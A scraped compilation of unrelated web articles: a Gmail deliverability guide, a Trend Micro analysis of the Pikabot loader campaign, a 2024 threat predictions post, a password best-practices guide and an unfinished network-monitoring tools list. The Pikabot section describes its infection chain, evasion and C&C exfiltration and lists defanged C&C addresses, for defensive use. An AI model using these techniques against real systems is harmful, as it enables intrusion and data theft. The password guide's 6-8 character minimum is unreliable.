  • Marketing emails are emails you send to promote your products and services. They don’t necessarily need to be sent immediately, and they are not essential for a customer.

There are 2 things to think about here.

First, marketing emails must have an unsubscribe link in the footer of the email. The link doesn’t have to be huge, but it has to be clearly visible.

Unsubscribe link example

Second, you should also make sure that your newsletters have a one-click unsubscribe link at the top.

One click unsubscribe link

In Gmail, this link triggers an instant unsubscribe popup. This is going to be important if you want to prevent your emails from being blocked in the future.

Gmail one click unsubscribe popup

The one-click unsubscribe link near the subject line is triggered by list unsubscribe headers. Your email provider should be able to add these headers for you.

If you’re not sure what to ask for, the header is the technical part of the email that we don’t normally see; here’s what it looks like:

List unsubscribe header example

One question we’re asked a lot is this: Do transactional emails need to have unsubscribe links? They do not. However:

  • Include unsubscribe links in all marketing emails.
  • Don’t send emails that have a mixture of transactional and marketing content in them to try to get around this rule.
  • It’s OK to give people the choice of which email marketing lists they want to be subscribed to, but Google is clear that you must also provide an option to unsubscribe from all marketing emails.

7. Use Double Optins Where Possible

Google recommends that everyone who sends marketing emails uses double optins.

A double optin means that someone has to choose to join your list and confirm their choice, usually by clicking a confirmation link.

While Google won’t block emails to Gmail if you don’t use double optins, the truth is that single optins result in higher spam complaints. So implementing them will keep that important spam complaint rate low.

The downside of double optins is that you’ll grow your list more slowly because you will sign up fewer leads.

Recovering From a Gmail Block

If your WordPress emails are being blocked to Gmail recipients, running through this guide should help you to figure out the reason why.

  • If Google is rejecting emails from your domain because it’s missing some crucial DNS records, adding them might resolve the problem quickly.
  • If your domain or IP is on a blacklist, it’ll take longer to recover. You’ll need to earn the trust of email providers and slowly improve your domain or IP reputation.
  • Make it easy for people to leave your mailing lists and don’t send them emails they don’t want. This will reduce the likelihood of them marking emails as spam, therefore keeping your spam complaint rate low.
  • It can take time to clean up your lists, but removing people who aren’t opening your emails is a good first step. Re-engagement workflows typically unsubscribe people who aren’t responsive, helping to reduce spam complaints, and automatically unsubscribing invalid email addresses can also help.

Email providers like Brevo or SMTP.com are used to helping customers with these issues. If you’re concerned, reach out to them for advice. They may be able to change your sender IP or help you look into your bounce rates to diagnose the problem.

It’s difficult to say how long recovery will take. It depends on the reason you were blocked and the severity of the problem. Either way, prevention is always better than the cure.

If WordPress emails are not being delivered to Gmail and you can’t figure out why, our support team is standing by to help.

Fix Your WordPress Emails Now

Next, Boost Your Site Security

Improving your site’s security will help you to block malicious logins, and that will reduce the risk of people using your domain to send spam.

Check out our list of the best security plugins for WordPress to harden your security against common threats.

Ready to fix your emails? Get started today with the best WordPress SMTP plugin. If you don’t have the time to fix your emails, you can get full White Glove Setup assistance as an extra purchase, and there’s a 14-day money-back guarantee for all paid plans.

If this article helped you out, please follow us on Facebook and Twitter for more WordPress tips and tutorials.

Source :
https://wpmailsmtp.com/fix-gmail-blocking-emails/

Black Basta-Affiliated Water Curupira’s Pikabot Spam Campaign

By: Shinji Robert Arasawa, Joshua Aquino, Charles Steven Derion, Juhn Emmanuel Atanque, Francisrey Joshua Castillo, John Carlo Marquez, Henry Salcedo, John Rainier Navato, Arianne Dela Cruz, Raymart Yambot, Ian Kenefick
January 09, 2024
Read time: 8 min (2105 words)

A threat actor we track under the Intrusion set Water Curupira (known to employ the Black Basta ransomware) has been actively using Pikabot. a loader malware with similarities to Qakbot, in spam campaigns throughout 2023.

Pikabot is a type of loader malware that was actively used in spam campaigns by a threat actor we track under the Intrusion set Water Curupira in the first quarter of 2023, followed by a break at the end of June that lasted until the start of September 2023. Other researchers have previously noted its strong similarities to Qakbot, the latter of which was taken down by law enforcement in August 2023. An increase in the number of phishing campaigns related to Pikabot was recorded in the last quarter of 2023, coinciding with the takedown of Qakbot — hinting at the possibility that Pikabot might be a replacement for the latter (with DarkGate being another temporary replacement in the wake of the takedown).

Pikabot’s operators ran phishing campaigns, targeting victims via its two components — a loader and a core module — which enabled unauthorized remote access and allowed the execution of arbitrary commands through an established connection with their command-and-control (C&C) server. Pikabot is a sophisticated piece of multi-stage malware with a loader and core module within the same file, as well as a decrypted shellcode that decrypts another DLL file from its resources (the actual payload).

In general, Water Curupira conducts campaigns for the purpose of dropping backdoors such as Cobalt Strike, leading to Black Basta ransomware attacks (coincidentally, Black Basta also returned to operations in September 2023). The threat actor conducted several DarkGate spam campaigns and a small number of IcedID campaigns in the early weeks of the third quarter of 2023, but has since pivoted exclusively to Pikabot.

Pikabot, which gains initial access to its victim’s machine through spam emails containing an archive or a PDF attachment, exhibits the same behavior and campaign identifiers as Qakbot

Figure 1. Our observations from the infection chain based on Trend’s investigation
Figure 1. Our observations from the infection chain based on Trend’s investigation

Initial access via email

The malicious actors who send these emails employ thread-hijacking, a technique where malicious actors use existing email threads (possibly stolen from previous victims) and create emails that look like they were meant to be part of the thread to trick recipients into believing that they are legitimate. Using this technique increases the chances that potential victims would select malicious links or attachments. Malicious actors send these emails using addresses (created either through new domains or free email services) with names that can be found in original email threads hijacked by the malicious actor. The email contains most of the content of the original thread, including the email subject, but adds a short message on top directing the recipient to open the email attachment.

This attachment is either a password-protected archive ZIP file containing an IMG file or a PDF file. The malicious actor includes the password in the email message. Note that the name of the file attachment and its password vary for each email.

Figure 2. Sample email with a malicious ZIP attachment
Figure 2. Sample email with a malicious ZIP attachment
Figure 3. Sample email with a malicious PDF attachment
Figure 3. Sample email with a malicious PDF attachment

The emails containing PDF files have a shorter message telling the recipient to check or view the email attachment.

The first stage of the attack

The attached archive contains a heavily obfuscated JavaScript (JS) with a file size amounting to more than 100 KB. Once executed by the victim, the script will attempt to execute a series of commands using conditional execution.

Figure 4. Files extracted to the attached archive (.zip or .img)
Figure 4. Files extracted to the attached archive (.zip or .img)
Figure 5. Deobfuscated JS command
Figure 5. Deobfuscated JS command

The script attempts command execution using cmd.exe. If this initial attempt is unsuccessful, the script proceeds with the following steps: It echoes a designated string to the console and tries to ping a specified target using the same string. In case the ping operation fails, the script employs Curl.exe to download the Pikabot payload from an external server, saving the file in the system’s temporary directory.

Subsequently, the script will retry the ping operation. If the retry is also unsuccessful, it uses rundll32.exe to execute the downloaded Pikabot payload (now identified as a .dll file) with “Crash” as the export parameter. The sequence of commands concludes by exiting the script with the specified exit code, ciCf51U2FbrvK.

We were able to observe another attack chain where the malicious actors implemented a more straightforward attempt to deliver the payload. As before, similar phishing techniques were performed to trick victims into downloading and executing malicious attachments. In this case, password-protected archive attachments were deployed, with the password contained in the body of the email.

However, instead of a malicious script, an IMG file was extracted from the attachment. This file contained two additional files — an LNK file posing as a Word document and a DLL file, which turned out to be the Pikabot payload extracted straight from the email attachment:

Figure 6. The content of the IMG file
Figure 6. The content of the IMG file

Contrary to the JS file observed earlier, this chain maintained its straightforward approach even during the execution of the payload.

Once the victim is lured into executing the LNK file, rundll32.exe will be used to run the Pikabot DLL payload using an export parameter, “Limit”.

The content of the PDF file is disguised to look like a file hosted on Microsoft OneDrive to convince the recipient that the attachment is legitimate. Its primary purpose is to trick victims into accessing the PDF file content, which is a link to download malware.

Figure 7. Malicious PDF file disguised to look like a OneDrive attachment; note the misspelling of the word “Download”
Figure 7. Malicious PDF file disguised to look like a OneDrive attachment; note the misspelling of the word “Download”
Figure 7. Malicious PDF file disguised to look like a OneDrive attachment; note the misspelling of the word “Download”

When the user selects the download button, it will attempt to access a malicious URL, then proceed to download a malicious JS file (possibly similar to the previously mentioned JS file).

The delivery of the Pikabot payload via PDF attachment is a more recent development, emerging only in the fourth quarter of 2023.

We discovered an additional variant of the malicious downloader that employed obfuscation methods involving array usage and manipulation:

Figure 8. Elements of array “_0x40ee” containing download URLs and JS methods used for further execution
Figure 8. Elements of array “_0x40ee” containing download URLs and JS methods used for further execution

Nested functions employed array manipulation methods using “push” and “shift,” introducing complexity to the code’s structure and concealing its flow to hinder analysis. The presence of multiple download URLs, the dynamic creation of random directories using the mkdir command, and the use of Curl.exe, as observed in the preceding script, are encapsulated within yet another array. 

The JavaScript will run multiple commands in an attempt to retrieve the malicious payload from different external websites using Curl.exe, subsequently storing it in a random directory created using mkdir.

Figure 9. Payload retrieval commands using curl.exe
Figure 9. Payload retrieval commands using curl.exe

The rundll32.exe file will continue to serve as the execution mechanism for the payload, incorporating its export parameter.

Figure 10. Payload execution using rundll32.exe
Figure 10. Payload execution using rundll32.exe

The Pikabot payload

We analyzed the DLL file extracted from the archive shown in Figure 6 and found it to be a sample of a 32-bit DLL file with 1515 exports. Calling its export function “Limit”, the file will decrypt and execute a shellcode that identifies if the process is being debugged by calling the Windows API NtQueryInformationProcess twice with the flag 0x7 (ProcessDebugPort) on the first call and 0x1F ProcessDebugFlags on the second call. This shellcode also decrypts another DLL file that it loads into memory and then eventually executes.

Figure 11. The shellcode calling the entry point of the decrypted DLL file
Figure 11. The shellcode calling the entry point of the decrypted DLL file

The decrypted DLL file will execute another anti-analysis routine by loading incorrect libraries and other junk to detect sandboxes. This routine seems to be copied from a certain GitHub article.

Security/Virtual Machine/Sandbox DLL filesReal DLL filesFake DLL files
cmdvrt.32.dllkernel32.dllNetProjW.dll
cmdvrt.64.dllnetworkexplorer.dllGhofr.dll
cuckoomon.dllNlsData0000.dllfg122.dll
pstorec.dll  
avghookx.dll  
avghooka.dll  
snxhk.dll  
api_log.dll  
dir_watch.dll  
wpespy.dll  

Table 1. The DLL files loaded to detect sandboxes

After performing the anti-analysis routine, the malware loads a set of PNG images from its resources section which contains an encrypted chunk of the core module and then decrypts them. Once the core payload has been decrypted, the Pikabot injector creates a suspended process (%System%\SearchProtocolHost) and injects the core module into it. The injector uses indirect system calls to hide its injection.

Figure 12. Loading the PNG images to build the core module
Figure 12. Loading the PNG images to build the core module

Resolving the necessary APIs is among the malware’s initial actions. Using a hash of each API (0xF4ACDD80x03A5AF65E, and 0xB1D50DE4), Pikabot uses two functions to obtain the addresses of the three necessary APIs, GetProcAddressLoadLibraryA, and HeapFree. This process is done by looking through kernel32.dll exports. The rest of the used APIs are resolved using GetProcAddress with decrypted strings. Other pertinent strings are also decrypted during runtime before they are used.

Figure 13. Harvesting the GetProcAddress and LoadLibrary API
Figure 13. Harvesting the GetProcAddress and LoadLibrary API
Figure 13. Harvesting the GetProcAddress and LoadLibrary API

The Pikabot core module checks the system’s languages and stops its execution if the language is any of the following:

  • Russian (Russia)
  • Ukrainian (Ukraine)
  •   

It will then ensure that only one instance of itself is running by creating a hard-coded mutex, {A77FC435-31B6-4687-902D-24153579C738}.

The next stage of the core module involves obtaining details about the victim’s system and forwarding them to a C&C server. The collected data uses a JSON format, with every data item  using the wsprintfW function to fill its position. The stolen data will look like the image in Figure 13 but with the collected information before encryption:

Figure 14. Stolen information in JSON format before encryption
Figure 14. Stolen information in JSON format before encryption

Pikabot seems to have a binary version and a campaign ID. The keys 0fwlm4g and v2HLF5WIO are present in the JSON data, with the latter seemingly being a campaign ID.

The malware creates a named pipe and uses it to temporarily store the additional information gathered by creating the following processes: 

  • whoami.exe /all
  • ipconfig.exe /all
  • netstat.exe -aon

Each piece of information returned will be encrypted before the execution of the process.

A list of running processes on the system will also be gathered and encrypted by calling CreateToolHelp32Snapshot and listing processes through Process32First and Process32Next.

Once all the information is gathered, it will be sent to one of the following IP addresses appended with the specific URL, cervicobrachial/oIP7xH86DZ6hb?vermixUnintermixed=beatersVerdigrisy&backoff=9zFPSr: 

  • 70[.]34[.]209[.]101:13720
  • 137[.]220[.]55[.]190:2223
  • 139[.]180[.]216[.]25:2967
  • 154[.]61[.]75[.]156:2078
  • 154[.]92[.]19[.]139:2222
  • 158[.]247[.]253[.]155:2225
  • 172[.]233[.]156[.]100:13721

However, as of writing, these sites are inaccessible.

C&C servers and impact

As previously mentioned, Water Curupira conducts campaigns to drop backdoors such as Cobalt Strike, which leads to Black Basta ransomware attacks.It is this potential association with a sophisticated type of ransomware such as Black Basta that makes Pikabot campaigns particularly dangerous.

The threat actor also conducted several DarkGate spam campaigns and a small number of IcedID campaigns during the early weeks of the third quarter of 2023, but has since pivoted exclusively to Pikabot.

Lastly, we have observed distinct clusters of Cobalt Strike beacons with over 70 C&C domains leading to Black Basta, and which have been dropped via campaigns conducted by this threat actor.

Security recommendations

To avoid falling victim to various online threats such as phishing, malware, and scams, users should stay vigilant when it comes to emails they receive. The following are some best practices in user email security:

  • Always hover over embedded links with the pointer to learn where the link leads.
  • Check the sender’s identity. Unfamiliar email addresses, mismatched email and sender names, and spoofed company emails are signs that the sender has malicious intent.
  • If the email claims to come from a legitimate company, verify both the sender and the email content before downloading attachments or selecting embedded links.
  • Keep operating systems and all pieces of software updated with the latest patches.
  • Regularly back up important data to an external and secure location. This ensures that even if you fall victim to a phishing attack, you can restore your information.

A multilayered approach can help organizations guard possible entry points into their system (endpoint, email, web, and network). Security solutions can detect malicious components and suspicious behavior, which can help protect enterprises.  

  • Trend Vision One™ provides multilayered protection and behavior detection, which helps block questionable behavior and tools before ransomware can do any damage. 
  • Trend Cloud One™ – Workload Security protects systems against both known and unknown threats that exploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine learning.  
  • Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails, including phishing emails that can serve as entry points for ransomware.  
  • Trend Micro Apex One™ offers next-level automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints.
     

Indicators of Compromise (IOCs)

The indicators of compromise for this blog entry can be found here.

Source :
https://www.trendmicro.com/it_it/research/24/a/a-look-into-pikabot-spam-wave-campaign.html

Forward Momentum: Key Learnings From Trend Micro’s Security Predictions for 2024

By: Trend Micro
December 06, 2023
Read time: 4 min (971 words)

In this blog entry, we discuss predictions from Trend Micro’s team of security experts about the drivers of change that will figure prominently in 2024.

Digital transformations in the year ahead will be led by organizations pursuing a pioneering edge from the integration of emergent technologies. Advances in cloud technology, artificial intelligence and machine learning (AI/ML), and Web3 are poised to reshape the threat landscape, giving it new frontiers outside the purview of traditional defenses. However, these technological developments are only as efficient as the IT structures that support them. In 2024, business leaders will have to take measures to ensure that their organization’s systems and processes are equipped to stay in step with these modern solutions — not to mention the newfound security challenges that come with implementing and securing them.

As the new year draws closer, decision-makers will need to stay on top of key trends and priority areas in enterprise cybersecurity if they are to make room for growth and fend off any upcoming threats along their innovation journey. In this blog entry, we discuss predictions from Trend Micro’s team of security experts about the drivers of change that will figure prominently next year.

Misconfigurations will allow cybercriminals to scale up their attacks using cloud-native worms

Enterprises should come into 2024 prepared to ensure that their cloud resources can’t be turned against them in “living-off-the-cloud” attacks. Security teams need to closely monitor cloud environments in anticipation of cyberattacks that, tailored with worming capabilities, can also abuse cloud misconfigurations to gain a foothold in their targets and use rootkits for persistence. Cloud technologies like containerized applications are especially at risk as once infected, these can serve as a launchpad from which attackers can spread malicious payloads to other accounts and services. Given their ability to infect multiple containers at once, leverage vulnerabilities at scale, and automate various tasks like reconnaissance, exploitation, and achieving persistence, worms will endure as a prominent tactic among cybercriminals next year.

AI-generated media will give rise to more sophisticated social engineering scams

The gamut of use cases for generative AI will be a boon not only for enterprises but also for fraudsters seeking new ways of profiteering in 2024. Though they’re often behind the curve when it comes to new technologies, expect cybercriminals — swayed by the potential of lucrative pay — to incorporate AI-generated lures as part of their upgraded social engineering attacks. Notably, despite the shutdown of malicious large language model (LLM) tool WormGPT, similar tools could still emerge from the dark web. In the interim, cybercriminals will also continue to find other ways to circumvent the limitations of legitimate AI tools available online. In addition to their use of digital impostors that combine various AI-powered tools in emerging threats like virtual kidnapping, we predict that malicious actors will resort specifically to voice cloning in more targeted attacks.

The rising tide of data poisoning will be a scourge on ML models under training

Integrating machine-learning (ML) models into their operations promises to be a real game changer for businesses that are banking on the potential of these models to supercharge innovation and productivity. As we step into 2024, attempts to corrupt the training data of these models will start gaining ground. Threat actors will likely carry out these attacks by taking advantage of a model’s data-collection phase or by compromising its data storage or data pipeline infrastructure. Specialized models using focused datasets will also be more vulnerable to data poisoning than LLMs and generative AI models trained on extensive datasets, which will prompt security practitioners to pay closer attention to the risks associated with tapping into external resources for ML training data.

Attackers will take aim at software supply chains through their CI/CD pipelines

Software supply chains will have a target on their back in 2024, as cybercriminals will aim to infiltrate them through their continuous integration and delivery (CI/CD) systems. For example, despite their use in expediting software development, components and code sourced from third-party libraries and containers are not without security risks, such as lacking thorough security audits, containing malicious or outdated components, or harboring overlooked vulnerabilities that could open the door to code-injection attacks. The call for developers to be wary of anything sourced from third parties will therefore remain relevant next year. Similarly, to safeguard the resilience of critical software development pipelines and weed out bugs in the coming year, DevOps practitioners should exercise caution and conduct routine scans of any external code they plan to use.

New extortion schemes and criminal gangs will be built around the blockchain

Whereas public blockchains are hardened by continuous cyberattacks, the same can’t be said of their permissioned counterparts because of the latter’s centralized nature. This lack of hard-won resilience will drive malicious actors to develop new extortion business models specific to private blockchains next year. In such extortion operations, criminals could use stolen keys to insert malicious data or modify existing records on the blockchain and then demand a payoff to stay mum on the attack. Threat actors can also strong-arm their victims into paying the ransom by wresting control of enough nodes to encrypt an entire private blockchain. As for criminal groups, we predict that 2024 will see the debut of the first criminal organizations running entirely on blockchains with smart contract or decentralized autonomous organizations (DAOs).

Countering future cyberthreats

Truly transformative technologies inevitably cross the threshold into standard business operations. But as they make that transition from novel to industry norm, newly adopted tools and solutions require additional layers of protection if they are to contribute to an enterprise’s expansion. So long as their security stance is anchored on preparedness and due diligence, organizations stand to reap the benefits from a growing IT stack without exposing themselves to unnecessary risks. To learn more about the key security considerations and challenges that lie ahead for organizations and end users, read our report, “Critical Scalability: Trend Micro Security Predictions for 2024.”

Source :
https://www.trendmicro.com/it_it/research/23/l/forward-momentum–key-learnings-from-trend-micro-s-security-pred.html

The Ultimate Guide to Password Best Practices: Guarding Your Digital Identity

Dirk Schrader
Published: November 14, 2023
Updated: November 24, 2023

In the wake of escalating cyber-attacks and data breaches, the ubiquitous advice of “don’t share your password” is no longer enough. Passwords remain the primary keys to our most important digital assets, so following password security best practices is more critical than ever. Whether you’re securing email, networks, or individual user accounts, following password best practices can help protect your sensitive information from cyber threats.

Read this guide to explore password best practices that should be implemented in every organization — and learn how to protect vulnerable information while adhering to better security strategies.

The Secrets of Strong Passwords

A strong password is your first line of defense when it comes to protecting your accounts and networks. Implement these standard password creation best practices when thinking about a new password:

  • Complexity: Ensure your passwords contain a mix of uppercase and lowercase letters, numbers, and special characters. It should be noted that composition rules, such as lowercase, symbols, etc. are no longer recommended by NIST — so use at your own discretion.
  • Length: Longer passwords are generally stronger — and usually, length trumps complexity. Aim for at least 6-8 characters.
  • Unpredictability: Avoid using common phrases or patterns. Avoid using easily guessable information like birthdays or names. Instead, create unique strings that are difficult for hackers to guess.

Handpicked related content:

Combining these factors makes passwords harder to guess. For instance, if a password is 8 characters long and includes uppercase letters, lowercase letters, numbers and special characters, the total possible combinations would be (26 + 26 + 10 + 30)^8. This astronomical number of possibilities makes it exceedingly difficult for an attacker to guess the password.

Of course, given NIST’s updated guidance on passwords, the best approach to effective password security is using a password manager — this solution will not only help create and store your passwords, but it will automatically reject common, easy-to-guess passwords (those included in password dumps). Password managers greatly increase security against the following attack types.

Password-Guessing Attacks

Understanding the techniques that adversaries use to guess user passwords is essential for password security. Here are some of the key attacks to know about:

Brute-Force Attack

In a brute-force attack, an attacker systematically tries every possible combination of characters until the correct password is found. This method is time-consuming but can be effective if the password is weak.

Strong passwords help thwart brute force attacks because they increase the number of possible combinations an attacker must try, making it unlikely they can guess the password within a reasonable timeframe.

Dictionary Attack

A dictionary attack is a type of brute-force attack in which an adversary uses a list of common words, phrases and commonly used passwords to try to gain access.

Unique passwords are essential to thwarting dictionary attacks because attackers rely on common words and phrases. Using a password that isn’t a dictionary word or a known pattern significantly reduces the likelihood of being guessed. For example, the string “Xc78dW34aa12!” is not in the dictionary or on the list of commonly used passwords, making it much more secure than something generic like “password.”

Dictionary Attack with Character Variations

In some dictionary attacks, adversaries also use standard words but also try common character substitutions, such as replacing ‘a’ with ‘@’ or ‘e’ with ‘3’. For example, in addition to trying to log on using the word “password”, they might also try the variant “p@ssw0rd”.

Choosing complex and unpredictable passwords is necessary to thwart these attacks. By using unique combinations and avoiding easily guessable patterns, you make it challenging for attackers to guess your password.

How Password Managers Enhance Security

Password managers are indispensable for securely storing and organizing your passwords. These tools offer several key benefits:

  • Security: Password managers store passwords and enter them for you, eliminating the need for users to remember them all. All users need to remember is the master password for their password manager tool. Therefore, users can use long, complex passwords as recommended by best practices without worrying about forgetting their passwords or resorting to insecure practices like writing passwords down or reusing the same password for multiple sites or applications.
  • Password generation: Password managers can generate a strong and unique password for user accounts, eliminating the need for individuals to come up with them.
  • Encryption: Password managers encrypt password vaults, ensuring the safety of data — even if it is compromised.
  • Convenience: Password managers enable users to easily access passwords across multiple devices.

When selecting a password manager, it’s important to consider your organization’s specific needs, such as support for the platforms you use, price, ease of use and vendor breach history. Conduct research and read reviews to identify the one that best aligns with your organization’s requirements. Some noteworthy options include Netwrix Password Secure, LastPass, Dashlane, 1Password and Bitwarden.

How Multifactor Authentication (MFA) Adds an Extra Layer of Security

Multifactor authentication strengthens security by requiring two or more forms of verification before granting access. Specifically, you need to provide at least two of the following authentication factors:

  • Something you know: The classic example is your password.
  • Something you have: Usually this is a physical device like a smartphone or security token.
  • Something you are: This is biometric data like a fingerprint or facial recognition.

MFA renders a stolen password worthless, so implement it wherever possible.

Password Expiration Management

Password expiration policies play a crucial role in maintaining strong password security. Using a password manager that creates strong passwords also has an influence on password expiration. If you do not use a password manager yet, implement a strategy to check all passwords within your organization; with a rise in data breaches, password lists (like the known rockyou.txt and its variations) used in brute-force attacks are constantly growing. The website haveibeenpawned.com offers a service to check whether a certain password has been exposed. Here’s what users should know about password security best practices related to password expiration:

  • Follow policy guidelines: Adhere to your organization’s password expiration policy. This includes changing your password when prompted and selecting a new, strong password that meets the policy’s requirements.
  • Set reminders: If your organization doesn’t enforce password expiration via notifications, set your own reminders to change your password when it’s due. Regularly check your email or system notifications for prompts.
  • Avoid obvious patterns: When changing your password, refrain from using variations of the previous one or predictable patterns like “Password1,” “Password2” and so on.
  • Report suspicious activity: If you notice any suspicious account activity or unauthorized password change requests, report them immediately to your organization’s IT support service or helpdesk.
  • Be cautious with password reset emails: Best practice for good password security means being aware of scams. If you receive an unexpected email prompting you to reset your password, verify its authenticity. Phishing emails often impersonate legitimate organizations to steal your login credentials.

Password Security and Compliance

Compliance standards require password security and password management best practices as a means to safeguard data, maintain privacy and prevent unauthorized access. Here are a few of the laws that require password security:

  • HIPAA (Health Insurance Portability and Accountability Act): HIPAA mandates that healthcare organizations implement safeguards to protect electronic protected health information (ePHI), which includes secure password practices.
  • PCI DSS (Payment Card Industry Data Security Standard): PCI DSS requires organizations that handle payment card data on their website to implement strong access controls, including password security, to protect cardholder data.
  • GDPR (General Data Protection Regulation): GDPR requires organizations that store or process the data of EU residents to implement appropriate security measures to protect personal data. Password security is a fundamental aspect of data protection under GDPR.
  • FERPA (Family Educational Rights and Privacy Act): FERPA governs the privacy of student education records. It includes requirements for securing access to these records, which involves password security.

Organizations subject to these compliance standards need to implement robust password policies and password security best practices. Failure to do so can result in steep fines and other penalties.

There are also voluntary frameworks that help organizations establish strong password policies. Two of the most well known are the following:

  • NIST Cybersecurity Framework: The National Institute of Standards and Technology (NIST) provides guidelines and recommendations, including password best practices, to enhance cybersecurity.
  • ISO 27001: ISO 27001 is an international standard for information security management systems (ISMSs). It includes requirements related to password management as part of its broader security framework.

Password Best Practices in Action

Now, let’s put these password security best practices into action with an example:

Suppose your name is John Doe and your birthday is December 10, 1985. Instead of using “JohnDoe121085” as your password (which is easily guessable), follow these good password practices:

  • Create a long, unique (and unguessable) password, such as: “M3an85DJ121!”
  • Store it in a trusted password manager.
  • Enable multi-factor authentication whenever available.

10 Password Best Practices

If you are looking to strengthen your security, follow these password best practices:

  • Remove hints or knowledge-based authentication: NIST recommends not using knowledge-based authentication (KBA), such as questions like “What town were you born in?” but instead, using something more secure, like two-factor authentication.
  • Encrypt passwords: Protect passwords with encryption both when they are stored and when they are transmitted over networks. This makes them useless to any hacker who manages to steal them.
  • Avoid clear text and reversible forms: Users and applications should never store passwords in clear text or any form that could easily be transformed into clear text. Ensure your password management routine does not use clear text (like in an XLS file).
  • Choose unique passwords for different accounts: Don’t use the same, or even variations, of the same passwords for different accounts. Try to come up with unique passwords for different accounts.
  • Use a password management: This can help select new passwords that meet security requirements, send reminders of upcoming password expiration, and help update passwords through a user-friendly interface.
  • Enforce strong password policies: Implement and enforce strong password policies that include minimum length and complexity requirements, along with a password history rule to prevent the reuse of previous passwords.
  • Update passwords when needed: You should be checking and – if the results indicate so – updating your passwords to minimize the risk of unauthorized access, especially after data breaches.
  • Monitor for suspicious activity: Continuously monitor your accounts for suspicious activity, including multiple failed login attempts, and implement account lockouts and alerts to mitigate threats.
  • Educate users: Conduct or partake in regular security awareness training to learn about password best practices, phishing threats, and the importance of maintaining strong, unique passwords for each account.
  • Implement password expiration policies: Enforce password expiration policies that require password changes at defined circumstances to enhance security.

How Netwrix Can Help

Adhering to password best practices is vital to safeguarding sensitive information and preventing unauthorized access.

Netwrix Password Secure provides advanced capabilities for monitoring password policies, detecting and responding to suspicious activity and ensuring compliance with industry regulations. With features such as real-time alerts, comprehensive reporting and a user-friendly interface, it empowers organizations to proactively identify and address password-related risks, enforce strong password policies, and maintain strong security across their IT environment.

Conclusion

In a world where cyber threats are constantly evolving, adhering to password management best practices is essential to safeguard your digital presence. First and foremost, create a strong and unique password for each system or application — remember that using a password manager makes it much easier to adhere to this critical best practice. In addition, implement multifactor authentication whenever possible to thwart any attacker who manages to steal your password. By following the guidelines, you can enjoy a safer online experience and protect your valuable digital assets.

Dirk Schrader

Dirk Schrader is a Resident CISO (EMEA) and VP of Security Research at Netwrix. A 25-year veteran in IT security with certifications as CISSP (ISC²) and CISM (ISACA), he works to advance cyber resilience as a modern approach to tackling cyber threats. Dirk has worked on cybersecurity projects around the globe, starting in technical and support roles at the beginning of his career and then moving into sales, marketing and product management positions at both large multinational corporations and small startups. He has published numerous articles about the need to address change and vulnerability management to achieve cyber resilience.

Source :
https://blog.netwrix.com/2023/11/15/password-best-practices/

The Best Network Monitoring Tools & Software

Marc Wilson UPDATED: October 20, 2023

The realm of Network Monitoring Tools, Software, and Vendors is Huge, to say the least. New software, tools, and utilities are being launched almost every year to compete in an ever-changing marketplace of IT monitoringserver monitoring, and system monitoring software.

I’ve test-driven, played with and implemented dozens during my career and this guide rounds up the best ones in an easy-to-read format and highlighted their main strengths and why I think they are in the top class of tools to use in your IT infrastructure and business.

Some of the features I am looking for are device discovery, uptime/downtime indicators, along with robust and thorough alerting systems (via email/SMS),  NetFlow and SNMP Integration as  well as considerations that are important with any software purchase such as ease of use and value for money.

The features from above were all major points of interest when evaluating software suites for this article and I’ll try to keep this article as updated as possible with new feature sets and improvements as they are released.

Here is our list of the top network monitoring tools:

  1. Auvik – EDITOR’S CHOICE This cloud platform provides modules for LAN monitoring, Wi-Fi monitoring, and SaaS system monitoring. The network monitoring package discovers all devices, maps the network, and then implements automated performance tracking. Get a 14-day free trial.
  2. Paessler PRTG Network Monitor – FREE TRIAL A collection of monitoring tools and many of those are network monitors. Runs on Windows Server. Start a 30-day free trial.
  3. SolarWinds Network Performance Monitor – FREE TRIAL The leading network monitoring system that uses SNMP to check on network device statuses. This monitoring tool includes autodiscovery that compiles an asset inventory and automatically draws up a network topology map. Runs on Windows Server. Start 30-day free trial.
  4. Checkmk – FREE TRIAL This hybrid IT infrastructure monitoring package includes a comprehensive network monitor that provides device status tracking and traffic analysis functions via the integration with ntop. Available as a Linux install package, Docker package, appliance and cloud application available in cloud marketplaces. Get a 30-day free trial.
  5. Datadog Network Monitoring – FREE TRIAL Provides good visibility over each of the components of your network and the connections between them – be it cloud, on-premises or hybrid environment. Troubleshoot infrastructure, apps and DNS issues effortlessly.
  6. ManageEngine OpManager – FREE TRIAL An SNMP-based network monitor that has great network topology layout options, all based on an autodiscovery process. Installs on Windows Server and Linux.
  7. NinjaOne RMM – FREE TRIAL This cloud-based system provides remote monitoring and management for managed service providers covering the systems of their clients.
  8. Site24x7 Network Monitoring – FREE TRIAL A cloud-based monitoring system for networks, servers, and applications. This tool monitors both physical and virtual resources.
  9. Atera – FREE TRIAL A cloud-based package of remote monitoring and management tools that include automated network monitoring and a network mapping utility.
  10. ManageEngine RMM Central – FREE TRIAL A powerful asset and network management that includes patching, remote access, and automated remediation.

Related Post: Best Bandwidth Monitoring Software and Tools for Network Traffic Usage

The Top Network Monitoring Tools and Software

Below you’ll find an updated list of the Latest Tools & Software to ensure your network is continuously tracked and monitored at all times of the day to ensure the highest up-times possible. Most of them have free Downloads or Trials to get you started for 15 to 30 days to ensure it meets your requirements.

What should you look for in network monitoring tools?

We reviewed the market for network monitoring software and analyzed the tools based on the following criteria:

  • An automated service that can perform network monitoring unattended
  • A device discovery routine that automatically creates an asset inventory
  • A network mapping service that shows live statuses of all devices
  • Alerts for when problems arise
  • The ability to communicate with network devices through SNMP
  • A free trial or a demo for a no-cost assessment
  • Value for money in a package that provides monitoring for all network devices at a reasonable price

With these selection criteria in mind, we have defined a shortlist of suitable network monitoring tools for all operating systems.

1. Auvik – FREE TRIAL

Auvik Network Monitoring

Auvik is a SaaS platform that offers a network discovery and mapping system that automates enrolment and then continues to operate in order to spot changes in network infrastructure. This system is able to centralize and unify the monitoring of multiple sites.

Key Features:

  • A SaaS package that includes processing power and storage space for system logs as well as the monitoring software
  • Centralizes the monitoring of networks on multiple sites
  • Watches over network device statuses
  • Offers two plans: Essential and Performance
  • Network traffic analysis included in the higher plan
  • Monitors virtual LANs as well as physical networks
  • Autodiscovery service
  • Network mapping
  • Alerts for automated monitoring
  • Integrations with third-party complimentary systems

Why do we recommend it?

